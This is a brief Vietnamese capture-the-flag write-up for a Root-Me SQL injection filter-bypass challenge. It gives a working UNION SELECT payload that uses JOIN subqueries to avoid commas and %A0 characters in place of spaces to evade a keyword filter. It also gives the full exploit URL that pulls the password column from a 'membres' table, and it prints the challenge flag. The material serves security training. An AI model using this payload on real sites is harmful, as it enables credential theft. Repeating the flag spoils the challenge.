# SQL injection - filter bypass

Ctrl +U trong trang login ta thấy cấu trúc bảng

Sau khi thử vái trường hợp, thấy nó sẽ filter các từ khóa truy vấn trong mysql ở dạng viết thường, và dấu phẩy dưới, và dấu cách ta sẽ inject với querry sau:

`-1 UNION SELECT * FROM (SELECT 1)id JOIN (SELECT 2)username JOIN (SELECT 3)pass JOIN (SELECT pass FROM membres LIMIT 1)email`

Sau đó bypass bằng cách thay dấu cách thành kí tự %A0

Tóm lại là : `http://challenge01.root-me.org/web-serveur/ch30/?action=membres&id=-1%A0UNION%A0SELECT%A0*%A0FROM%A0(SELECT%A01)id%A0JOIN%A0(SELECT%A02)username%A0JOIN%A0(SELECT%A03)pass%A0JOIN%A0(SELECT%A0pass%A0FROM%A0membres%A0LIMIT%A01)email--%A0-`

---

### Flag:

`KLfgyTIJbdhursqli`